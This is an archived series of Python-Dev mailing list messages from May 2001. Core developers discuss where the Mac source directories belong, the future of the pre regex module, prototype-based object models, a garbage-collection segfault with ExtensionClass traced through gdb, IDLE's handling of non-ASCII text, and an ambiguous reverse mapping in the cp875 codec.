oratrix.nl Fri May 11 16:56:39 2001 From: jack at oratrix.nl (Jack Jansen) Date: Fri, 11 May 2001 16:56:39 +0200 Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: Message by "Martin v.
Loewis" , Fri, 11 May 2001 16:41:33 +0200 , <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> Message-ID: <20010511145640.9FCB5303181@snelboot.oratrix.nl> > It seems, however, that some of the directory structure is backwards: > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There > may be others of this kind. Yes, now that the Mac stuff is integrated with the mainstream again this might be a good idea. > I also wonder whether all these files are still needed, and meant to > be distributed. E.g. I see chdir.c having the comment > > /* Chdir for the Macintosh. > Public domain by Guido van Rossum, CWI, Amsterdam (July 1987). > Pathnames must be Macintosh paths, with colons as separators. */ > > Is it really the case that the Mac API hasn't grown a chdir call in 13 > years? Hmm, hmm, I'm unsure. MacOS (<= 9) itself doesn't have chdir, because it doesn't believe in current directories (by design. Whether I agree with the design is a different matter:-). Normally MacPython is built with a special unix-compatibility library, GUSI, which does provide these calls. However, it is still possible to build without GUSI, and actually in the process of porting MacPython to Carbon ("MacOSX in its MacOS API model") I've used these compatibility routines again, until I finally got GUSI ported. But it's easy enough to cvs-remove them from the normal tree, to be revived when needed. What do people think? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From pedroni at inf.ethz.ch Fri May 11 16:56:48 2001 From: pedroni at inf.ethz.ch (Samuele Pedroni) Date: Fri, 11 May 2001 16:56:48 +0200 (MET DST) Subject: [Python-Dev] Type/class Message-ID: <200105111456.QAA00228@core.inf.ethz.ch> Hi.
> > Reading up on MetaClasses in Smalltalk again makes me appreciate > the simplicity of a prototype system where everything is just > an object -- all objects can be cloned, and some objects are > only used for cloning -- they are the exemplars of their type > which fill the role of Classes. > I agree. I often read that Smalltalk is "simple" up to metaclasses; on the other hand, the casual user can just ignore them. > Unfortunately, although prototypes would be a lot simpler, it > would be a pretty incompatible change for Python -- I can't think > of any way to get there without a lot of breakage. > > (Still -- I wonder if there's a way they could be used under > the covers in the implementation to make it simpler. Prototype > semantics are basically a superset of Class based semantics, which > is how it was easy to do Smalltalk in Self.) > [Ignoring the fact that code and changes require coders] Thinking in terms of proto-objects, parent slots and list parent slots: a python instance I has data slots and a parent slot __class__, a python class C has data slots and a list parent slot __bases__, and then we have the python rules (not very uniform): function from I directly => function; function from I.__class__ => bound method; function from C => unbound method. That's the difficult part for every model that aims to remain compatible. Samuele Pedroni. From thomas.heller at ion-tof.com Fri May 11 17:40:10 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Fri, 11 May 2001 17:40:10 +0200 Subject: [Python-Dev] Type/class References: Message-ID: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook> > Reading up on MetaClasses in Smalltalk again makes me appreciate > the simplicity of a prototype system where everything is just > an object -- all objects can be cloned, and some objects are > only used for cloning -- they are the exemplars of their type > which fill the role of Classes.
> > Unfortunately, although prototypes would be a lot simpler, it > would be a pretty incompatible change for Python -- I can't think > of any way to get there without a lot of breakage. > > (Still -- I wonder if there's a way they could be used under > the covers in the implementation to make it simpler. Prototype > semantics are basically a superset of Class based semantics, which > is how it was easy to do Smalltalk in Self.) I never looked at Self or other prototype based systems. Is it really true that prototypes are a lot simpler than metaclasses, but on the other hand more powerful? The 'brain exploding properties' of metaclasses are IMO only there because my brain cannot think easily in too many recursion steps... Thomas From fdrake at acm.org Fri May 11 18:25:54 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Fri, 11 May 2001 12:25:54 -0400 (EDT) Subject: [Python-Dev] status of pre? Message-ID: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> Have we formulated a plan of action regarding PCRE and the pre module? Are we planning to leave them in for another version, or is SRE considered sufficiently stable? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From sdm7g at Virginia.EDU Fri May 11 18:29:30 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Fri, 11 May 2001 12:29:30 -0400 (EDT) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com> Message-ID: On Fri, 11 May 2001, Fred L. Drake, Jr. wrote: > > Martin v. Loewis writes: > > Is it really the case that the Mac API hasn't grown a chdir call in 13 > > years? > > Yikes! I just search developer.apple.com for "chdir" and came up > with no hits, but I really don't know just what that tells me. > chdir() is required for POSIX compliance, but it isn't mentioned in > the C9X final committee draft. 
There isn't a chdir in any of the pre-OSX Mac *system* libraries, and Mac has never claimed any POSIX compliance (even with OSX, they have officially said it's almost certainly POSIX compliant but they have no plans for now to go thru the hoops and paperwork to get it certified.) chdir is in unistd.h, which isn't part of the standard C library. However, the Metrowerks *compiler* and IDE for the Mac do include in MSL (Metrowerks Standard Library) a unistd.[hc] with chdir. ( MW selling development tools obviously has more interest in being POSIX compliant than Apple! ) I don't know if there's one in the MPW libraries, so maybe you still want to leave it there. -- Steve Majewski From guido at digicool.com Fri May 11 20:47:38 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 13:47:38 -0500 Subject: [Python-Dev] status of pre? In-Reply-To: Your message of "Fri, 11 May 2001 12:25:54 -0400." <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> Message-ID: <200105111847.NAA05835@cj20424-a.reston1.va.home.com> > Have we formulated a plan of action regarding PCRE and the pre > module? Are we planning to leave them in for another version, or is > SRE considered sufficiently stable? Hm. It should disappear but I believe I've heard people say they were forced to use it because of the recursion limit problems with SRE on some platforms. We could put a warning on using pre or pcre in 2.2, and remove it in 2.3, hoping that /F fixes the recursion limit problems in the meantime (weren't those related to the backtracking implementation)?
--Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Fri May 11 22:41:30 2001 From: skip at pobox.com (skip at pobox.com) Date: Fri, 11 May 2001 15:41:30 -0500 Subject: [Python-Dev] GC and ExtensionClass Message-ID: <15100.20090.573866.569667@beluga.mojam.com> Has anyone investigated interactions between ExtensionClass objects and GC? I've encountered segfaults with 2.1 in certain situations when using the latest PyGtk stuff. The gdb traceback (appended) sort of suggests the two intersect somewhere. PyGtk provides a Python interface to the Gtk widget set using ExtensionClasses. Any ideas how I should approach the problem? I don't know either piece of code at all and the code that generates the segfault isn't particularly small, not to mention that it uses the bleeding edge Gtk stuff (which I doubt anyone on this list will have installed) and a version of ExtensionClass patched by James Henstridge, the PyGtk author. Here's what I know: 1. Disabling gc gets rid of the segfault. 2. I only see the problem with importing a specific module that subclasses the GtkTextView widget from the Python command line. If I run it as a script from the shell prompt, I get no segfault. 3. If I first import the gtk module, then import my module, I get no segfault. 4. Most changes I make to the module causing the problem cause the problem to disappear. All told, all this really tells me is I'm probably dealing with a malloc/free problem of some sort. Neil and/or Jim (and/or anyone else willing to look into this problem), I can give you access to my development machine via ssh if you think that would help debug the problem.
Skip #0 0x0807163d in visit_decref (op=0x4034ece0, data=0x0) at ../Modules/gcmodule.c:153 #1 0x08096dc6 in tupletraverse (o=0x8290d6c, visit=0x8071630 , arg=0x0) at ../Objects/tupleobject.c:366 #2 0x08071672 in subtract_refs (containers=0x80b8ac0) at ../Modules/gcmodule.c:167 #3 0x08071abf in collect (young=0x80b8ac0, old=0x80b8acc) at ../Modules/gcmodule.c:379 #4 0x08071d53 in collect_generations () at ../Modules/gcmodule.c:484 #5 0x08071db7 in _PyGC_Insert (op=0x82ea9c4) at ../Modules/gcmodule.c:507 #6 0x0808d743 in PyDict_New () at ../Objects/dictobject.c:149 #7 0x401ef977 in getBaseDictionary (type=0x4034d320) at ExtensionClass.c:1244 #8 0x401f0979 in initializeBaseExtensionClass (self=0x4034d320) at ExtensionClass.c:1485 #9 0x401f6774 in export_subclassed_type (dict=0x82d33a4, name=0x40337c55 "GtkTreeViewColumn", typ=0x4034d320, bases=0x82ea9a4) at ExtensionClass.c:3410 #10 0x4022a360 in pygobject_register_class (dict=0x82d33a4, class_name=0x40337c55 "GtkTreeViewColumn", get_type=0x404c4080 , ec=0x4034d320, bases=0x82ea9a4) at gobjectmodule.c:202 #11 0x4032fd7e in pygtk_register_classes (d=0x82d33a4) at gtk.c:30071 #12 0x402f0ed0 in init_gtk () at gtkmodule.c:98 #13 0x0806927c in _PyImport_LoadDynamicModule (name=0xbfffcd00 "gtk._gtk", pathname=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", fp=0x82ab6e0) at ../Python/importdl.c:52 #14 0x08067780 in load_module (name=0xbfffcd00 "gtk._gtk", fp=0x82ab6e0, buf=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", type=3) at ../Python/import.c:1296 #15 0x080683eb in import_submodule (mod=0x82963bc, subname=0xbfffcd04 "_gtk", fullname=0xbfffcd00 "gtk._gtk") at ../Python/import.c:1815 #16 0x08067f6a in load_next (mod=0x82963bc, altmod=0x80bf3cc, p_name=0xbfffd130, buf=0xbfffcd00 "gtk._gtk", p_buflen=0xbfffccfc) at ../Python/import.c:1671 #17 0x08067bcc in import_module_ex (name=0x0, globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1522 #18 
0x08067d23 in PyImport_ImportModuleEx (name=0x8290aac "_gtk", globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1563 #19 0x0809f4b9 in builtin___import__ (self=0x0, args=0x8291124) at ../Python/bltinmodule.c:31 #20 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2838 #21 0x080590d5 in call_object (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2801 #22 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2734 #23 0x08057764 in eval_code2 (co=0x82910d0, globals=0x8295f1c, locals=0x8295f1c, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #24 0x08055085 in PyEval_EvalCode (co=0x82910d0, globals=0x8295f1c, locals=0x8295f1c) at ../Python/ceval.c:346 #25 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffe0b0 "gtk", co=0x82910d0, pathname=0xbfffd340 "/usr/local/lib/python2.1/site-packages/gtk/__init__.pyc") at ../Python/import.c:490 #26 0x08066fc7 in load_source_module (name=0xbfffe0b0 "gtk", pathname=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", fp=0x80d1a20) at ../Python/import.c:754 #27 0x0806775e in load_module (name=0xbfffe0b0 "gtk", fp=0x80d1a20, buf=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", type=1) at ../Python/import.c:1287 #28 0x08067129 in load_package (name=0xbfffe0b0 "gtk", pathname=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk") at ../Python/import.c:811 #29 0x08067791 in load_module (name=0xbfffe0b0 "gtk", fp=0x0, buf=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk", type=5) at ../Python/import.c:1310 #30 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffe0b0 "gtk", fullname=0xbfffe0b0 "gtk") at ../Python/import.c:1815 #31 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, p_name=0xbfffe4e0, buf=0xbfffe0b0 "gtk", p_buflen=0xbfffe0ac) at ../Python/import.c:1671 #32 0x08067bcc in 
import_module_ex (name=0x0, globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1522 #33 0x08067d23 in PyImport_ImportModuleEx (name=0x811556c "gtk", globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1563 #34 0x0809f4b9 in builtin___import__ (self=0x0, args=0x829651c) at ../Python/bltinmodule.c:31 #35 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2838 #36 0x080590d5 in call_object (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2801 #37 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2734 #38 0x08057764 in eval_code2 (co=0x82968b8, globals=0x828c3fc, locals=0x828c3fc, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #39 0x08055085 in PyEval_EvalCode (co=0x82968b8, globals=0x828c3fc, locals=0x828c3fc) at ../Python/ceval.c:346 #40 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffeff0 "seg", co=0x82968b8, pathname=0xbfffe6f0 "seg.pyc") at ../Python/import.c:490 #41 0x08066fc7 in load_source_module (name=0xbfffeff0 "seg", pathname=0xbfffeb60 "seg.py", fp=0x820cd60) at ../Python/import.c:754 #42 0x0806775e in load_module (name=0xbfffeff0 "seg", fp=0x820cd60, buf=0xbfffeb60 "seg.py", type=1) at ../Python/import.c:1287 #43 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffeff0 "seg", fullname=0xbfffeff0 "seg") at ../Python/import.c:1815 #44 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, p_name=0xbffff420, buf=0xbfffeff0 "seg", p_buflen=0xbfffefec) at ../Python/import.c:1671 #45 0x08067bcc in import_module_ex (name=0x0, globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1522 #46 0x08067d23 in PyImport_ImportModuleEx (name=0x828c61c "seg", globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1563 #47 0x0809f4b9 in builtin___import__ (self=0x0, args=0x80e7bc4) at 
../Python/bltinmodule.c:31 #48 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2838 #49 0x080590d5 in call_object (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2801 #50 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2734 #51 0x08057764 in eval_code2 (co=0x8115908, globals=0x80d21e4, locals=0x80d21e4, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #52 0x08055085 in PyEval_EvalCode (co=0x8115908, globals=0x80d21e4, locals=0x80d21e4) at ../Python/ceval.c:346 #53 0x0806da1f in run_node (n=0x8115558, filename=0x80a496d "", globals=0x80d21e4, locals=0x80d21e4, flags=0xbffff708) at ../Python/pythonrun.c:1045 #54 0x0806cb2a in PyRun_InteractiveOneFlags (fp=0x4018e620, filename=0x80a496d "", flags=0xbffff708) at ../Python/pythonrun.c:570 #55 0x0806c98c in PyRun_InteractiveLoopFlags (fp=0x4018e620, filename=0x80a496d "", flags=0xbffff708) at ../Python/pythonrun.c:510 #56 0x0806c85a in PyRun_AnyFileExFlags (fp=0x4018e620, filename=0x80a496d "", closeit=0, flags=0xbffff708) at ../Python/pythonrun.c:473 #57 0x08051fae in Py_Main (argc=1, argv=0xbffff78c) at ../Modules/main.c:320 #58 0x400831f0 in __libc_start_main () from /lib/libc.so.6 From guido at digicool.com Fri May 11 23:49:00 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 16:49:00 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Fri, 11 May 2001 15:41:30 EST." <15100.20090.573866.569667@beluga.mojam.com> References: <15100.20090.573866.569667@beluga.mojam.com> Message-ID: <200105112149.QAA07533@cj20424-a.reston1.va.home.com> > Has anyone investigated interactions between ExtensionClass objects and GC? > I've encountered segfaults with 2.1 in certain situations when using the > latest PyGtk stuff. The gdb traceback (appended) sort of suggests the two > intersect somewhere. 
PyGtk provides a Python interface to the Gtk widget > get using ExtensionClasses. Any ideas how I should approach the problem? I > don't know either piece of code at all and the code that generates the > segfault isn't particularly small, not to mention which it uses the bleeding > edge Gtk stuff (which I doubt anyone on this list will have installed) and a > version of ExtensionClass patched by James Henstridge, the PyGtk author. > > Here's what I know: > > 1. Disabling gc gets rid of the segfault > 2. I only see the problem with importing a specific module that > subclasses the GtkTextView widget from the Python command line. If I > run it as a script from the shell prompt, I get no segfault. > 3. If I first import the gtk module, then import my module, I get no > segfault. > 4. Most changes I make to the module causing the problem cause the > problemm to disappear. > > All told, all this really tells me is I'm probably dealing with a > malloc/free problem of some sort. > > Neil and/or Jim (and/or anyone else willing to look into this problem), I > can give you access to my development machine via ssh if you think that > would help debug the problem. AFAIK, the latest version of Zope (which uses ExtensionClass extensively if not exclusively :-) works fine with Python 2.1. This suggests pointing a finger towards the PyGtk code... :-( --Guido van Rossum (home page: http://www.python.org/~guido/) From loewis at informatik.hu-berlin.de Fri May 11 22:53:55 2001 From: loewis at informatik.hu-berlin.de (Martin von Loewis) Date: Fri, 11 May 2001 22:53:55 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters Message-ID: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Thanks to a bug report I got, I noticed for the first time that you cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell prompt, you may get >>> s='??' 
UnicodeError: ASCII encoding error: ordinal not in range(128) Likewise, when trying to save a file that has non-ASCII characters, you get a traceback. Now, I think I understand all the causes of the problem (Tkinter returning Unicode objects, and so on). However, I'm curious whether anybody has proposals on how to deal with it. For saving text files, if Python had an encoding directive, things might be easier :-) For the shell prompt, I've no idea how to solve this best. So any suggestions are welcome. Regards, Martin From fredrik at pythonware.com Sat May 12 00:18:27 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Sat, 12 May 2001 00:18:27 +0200 Subject: [Python-Dev] status of pre? References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com> Message-ID: <00ca01c0da68$4fc66570$e46940d5@hagrid> guido wrote: > > We could put a warning on using pre or pcre in 2.2, and remove it in > 2.3, hoping that /F fixes the recursion limit problems in the mean > time (weren't those related to the backtracking implementation)? 2.2 is to be released in October, right? I'm sure I could shake out the remaining bugs in my "stackless SRE" patch by then... Cheers /F From fredrik at effbot.org Sat May 12 01:03:10 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Sat, 12 May 2001 01:03:10 +0200 Subject: [Python-Dev] Hats off to them! Message-ID: <014a01c0da6e$93578ca0$e46940d5@hagrid> http://www.theregister.co.uk/content/4/18909.html "Microsoft Altair BASIC legend talks about Linux, CPRM and that very frightening photo ... His other passion, he tells us, is Python. "Hats off to them. It's an extremely well designed language. It's object orientated from the get-go. They've really succeeded there," he says, and commends it as the ideal teaching language. That used to be BASIC, of course" ...
(no, it's not Bill) Cheers /F From fredrik at effbot.org Sat May 12 01:14:47 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Sat, 12 May 2001 01:14:47 +0200 Subject: [Python-Dev] Hats off to them! References: <014a01c0da6e$93578ca0$e46940d5@hagrid> Message-ID: <015001c0da70$3078cf70$e46940d5@hagrid> > "Hats off to them. It's an extremely well designed language. It's > object orientated from the get-go. They've really succeeded there," > he says, and commends it as the ideal teaching language. That > used to be BASIC, of course" reading on, I'm not sure why BASIC ever was the ideal teaching language: http://www.americanhistory.si.edu/csr/comphist/gates.htm#tc11 "One of the nice things about this BASIC is it has this so called direct mode. So you can PRINT 2 + 2. It prints the square root of ten" Cheers /F From sdm7g at Virginia.EDU Sat May 12 04:43:31 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Fri, 11 May 2001 22:43:31 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook> Message-ID: On Fri, 11 May 2001, Thomas Heller wrote: > I never looked at Self or other prototype based systems. > Is it really true that prototypes are a lot simpler than > metaclasses, but on the other hand more powerful? Definitely simpler: No classes, No metaclasses, only objects. Ignore for now the fact that a limited set of classes are handier for a statically type checked language and just consider dynamic languages, which is their proper domain. Prototype semantics basically subsume class semantics. Any object can be an exemplar and fill the role of a class, and it can be used ONLY as a template and holder of shared behaviour, so it can be used like a class. [One of the Self papers -- one which I haven't read -- is entitled "Self includes Smalltalk" -- and is, I believe, a demonstration that Smalltalk is sort of a subset of Self.] But you can also have finer-grained classification and you can have object inheritance.
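To make the "exemplar as class" idea concrete, here is a minimal Python sketch. It is not modeled on Self, XlispStat, or any real system, and the class name Proto and its clone/send methods are hypothetical. Each object holds its own slots plus a list of parent objects; a lookup that misses is delegated to the parents, so shared behaviour can live on an exemplar while each clone carries its own state.

```python
class Proto:
    """A prototype object: its own slots plus a list of parent objects."""

    def __init__(self, *parents, **slots):
        # Store bookkeeping via object.__setattr__ to skip our own hook.
        object.__setattr__(self, "_parents", list(parents))
        object.__setattr__(self, "_slots", dict(slots))

    def __getattr__(self, name):
        # Called only when normal lookup fails, i.e. for slot names.
        slots = object.__getattribute__(self, "_slots")
        if name in slots:
            return slots[name]
        # Delegate to the parents in order; the first one that answers wins.
        for parent in object.__getattribute__(self, "_parents"):
            try:
                return getattr(parent, name)
            except AttributeError:
                pass
        raise AttributeError(name)

    def __setattr__(self, name, value):
        # Assignment always creates or updates a slot on this object only.
        self._slots[name] = value

    def clone(self, **slots):
        # A clone delegates everything it does not override to self.
        return Proto(self, **slots)

    def send(self, name, *args):
        # Look the method up along the parent chain, but run it against
        # the receiver, so behaviour lives on the exemplar and state on
        # each clone.
        return getattr(self, name)(self, *args)


point = Proto(x=0, y=0, norm1=lambda self: abs(self.x) + abs(self.y))
p = point.clone(x=3, y=-4)
print(p.send("norm1"))  # 7: method found on point, state taken from p
point.label = "origin"  # added to the exemplar after p was cloned
print(p.label)          # origin: p sees it through delegation
```

Because lookup walks the parent list at access time, a slot added to the exemplar later is immediately visible to its clones, which is the delegation behaviour described in this thread.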
( This is handy in XlispStat, which is oriented towards statistics and analysis: you can have derived objects, for example different subsamples of the same population, or in my app, different energy spectra, along with derived and processed spectra with special rules for treatment: e.g. linearly filtered spectra have a filter function or kernel, and if they are fit against reference spectra, they need to be fit against references that have had the same filter applied to them -- if none is available, create one from unfiltered samples -- and maybe a whole chain of derived data. In a class based system, you would have to manually maintain a separate linked list of objects, but in a prototype system they can all be cloned from their parent objects. ) The other plus for things like exploratory statistics is that you don't have to design a class hierarchy ahead of time -- it's more concrete and less abstract than a class based system. Prototypes can also solve some of the problems that Jim Fulton's acquisition framework in Zope is designed to handle. (But it's been a while since I read that paper and I haven't used it, so I'm relying on my memory of thinking "Yeah -- that would be simpler with prototypes" ) You definitely don't have to worry about simulating the Prototype Pattern. (I've seen GUI systems in C++ that go thru a lot of code to add prototype-like behavior to C++ classes.) But -- unless I can figure a useful way to use it under the covers, it's not really a topic for python-dev. > The 'brain exploding properties' of metaclasses are IMO > only there because my brain cannot think easily in too > many recursion steps... It's just like spelling bananana -- the problem is to know when to stop! ;-) -- Steve Majewski From tim_one at email.msn.com Sat May 12 13:28:27 2001 From: tim_one at email.msn.com (Tim Peters) Date: Sat, 12 May 2001 07:28:27 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875?
Message-ID: I have a way to make dict lookup a teensy bit cheaper(*) that significantly reduces the number of collisions (which is much more valuable). This caused a number of std tests to fail, because they were implicitly relying on the order in which a dict's entries are materialized via .keys() or .items(). Most of these were easy enough to fix. The last failure remaining is test_unicode, and I don't know how to fix it. It's dying here: try: verify(unicode(s,encoding).encode(encoding) == s) except TestFailed: print '*** codec "%s" failed round-trip' % encoding except ValueError,why: print '*** codec for "%s" failed: %s' % (encoding, why) when encoding == "cp875". There's a bogus problem you have to worm around first: test_unicode neglected to import TestFailed, so it actually dies with NameError while trying the "except TestFailed" clause after verify() raises TestFailed. Once that's repaired, it's complaining about failing the round-trip encoding. The original character in s it's griping about is "?" (0x3f). cp875.py has this entry in its decoding_map dict: 0x003f: 0x001a, # SUBSTITUTE But 0x1a is not a *unique* value in this dict. There's also 0x00dc: 0x001a, # SUBSTITUTE 0x00e1: 0x001a, # SUBSTITUTE 0x00ec: 0x001a, # SUBSTITUTE 0x00ed: 0x001a, # SUBSTITUTE 0x00fc: 0x001a, # SUBSTITUTE 0x00fd: 0x001a, # SUBSTITUTE Therefore what appears associated with 0x1a in the derived encoding_map dict: encoding_map = {} for k,v in decoding_map.items(): encoding_map[v] = k may end up being any of the 7 decoding_map keys that map to 0x1a. It just so happened to map back to 0x3f before, but to 0xfd after the dict change, so "?" doesn't survive the round trip anymore. My knowledge of encoding internals is exceeded only by my mastery of file URLs under Windows , so I could sure use some help getting this repaired. I'd really like to check in the dict improvement (+ test repairs), but won't do it so long as it makes a std test fail. 
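A minimal sketch of one way to make that inversion independent of dict ordering, assuming "lowest byte value wins" is the desired policy (the thread does not settle which byte should win). The helper name invert_charmap is hypothetical and is not part of the codecs machinery. Walking the items in reverse sorted order means the smallest byte is written last and therefore wins.

```python
def invert_charmap(decoding_map):
    """Build an encoding map (code point -> byte) from a decoding map.

    Several bytes may decode to the same code point.  Walking the items
    in reverse sorted order writes the smallest byte last, so it wins
    no matter how the dict happens to order its entries.
    """
    encoding_map = {}
    for byte, codepoint in sorted(decoding_map.items(), reverse=True):
        encoding_map[codepoint] = byte
    return encoding_map


# The seven cp875 entries quoted above that all decode to U+001A.
decoding_map = {0x3f: 0x1a, 0xdc: 0x1a, 0xe1: 0x1a, 0xec: 0x1a,
                0xed: 0x1a, 0xfc: 0x1a, 0xfd: 0x1a}
encoding_map = invert_charmap(decoding_map)
print(hex(encoding_map[0x1a]))  # 0x3f, so "?" survives the round trip
```

This only makes the choice deterministic: the other six bytes that decode to U+001A still cannot round-trip, because a many-to-one decoding can preserve at most one of them.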
If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings winning the game, then iterating over decoding_map.items() in reverse sorted order would do the trick reliably. But I don't know whether the ambiguity in cp875 is a bug or an undocumented feature ... 7-bit-ascii-looks-better-every-day-ly y'rs - tim (*) Simply by taking the damn "~" off "~hash" -- I explained quite a while ago why that can lead to a weak form of clustering "in theory", and instrumenting the dict lookup code confirmed that it does hurt in real life. From guido at digicool.com Sat May 12 14:28:23 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 07:28:23 -0500 Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: Your message of "Fri, 11 May 2001 22:43:31 -0400." References: Message-ID: <200105121228.HAA08988@cj20424-a.reston1.va.home.com> Do prototype-based languages have the equivalent of multiple inheritance? --Guido van Rossum (home page: http://www.python.org/~guido/) From tim_one at email.msn.com Sat May 12 14:16:33 2001 From: tim_one at email.msn.com (Tim Peters) Date: Sat, 12 May 2001 08:16:33 -0400 Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: <200105121228.HAA08988@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Do prototype-based language have the equivalence of multiple > inheritance? Just as for class-based languages, whether a prototype-based language supports an MI workalike varies by language. In a class-based language with MI, a class can have multiple base classes; in a prototype-based language with an MI workalike, an object can have multiple prototype objects. The same kinds of ambiguities can arise, and the same kinds of resolution strategies are applicable (imposed linearization; user-supplied qualification; user-supplied renaming; guessing <0.7 wink>). JavaScript is the best-known prototype language that does not support multiple prototypes per object.
A very readable intro to its object model is here: http://developer.netscape.com/docs/manuals/communicator/jsobj/jsobj.pdf It's interesting because, near the end, the author explores a bit how far you can get *trying* to fake MI in JS. The answer is "farther than you might think", but not all the way. From fredrik at pythonware.com Sat May 12 14:25:43 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Sat, 12 May 2001 14:25:43 +0200 Subject: [Python-Dev] Ill-defined encoding for CP875? References: Message-ID: <02e501c0dade$ab7f1080$e46940d5@hagrid> tim wrote: > If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings > winning the game, then iterating over decoding_map.items() in reverse sorted > order would do the trick reliably. reverse sorting makes sense to me. but the cp-files appear to be machine generated, so patching that python file won't help. > But I don't know whether the ambiguity in cp875 is a bug or an undocumented > feature ... a truly future-proof solution would be to specify exactly how to resolve every many-to-one mapping, for every font having that problem. but sorting them is clearly better than relying on implementation-dependent behaviour... (is Jython using exactly the same hashing and dictionary algorithms as CPython? or does it work by accident also under Jython?) Cheers /F From nas at python.ca Sat May 12 16:28:54 2001 From: nas at python.ca (Neil Schemenauer) Date: Sat, 12 May 2001 07:28:54 -0700 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <15100.20090.573866.569667@beluga.mojam.com>; from skip@pobox.com on Fri, May 11, 2001 at 03:41:30PM -0500 References: <15100.20090.573866.569667@beluga.mojam.com> Message-ID: <20010512072854.A4271@glacier.fnational.com> skip at pobox.com wrote: > > Has anyone investigated interactions between ExtensionClass objects and GC? > I've encountered segfaults with 2.1 in certain situations when using the > latest PyGtk stuff. 
